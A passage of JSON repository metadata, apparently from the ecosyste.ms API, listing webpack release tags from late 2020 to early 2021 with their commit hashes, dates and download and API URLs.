pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/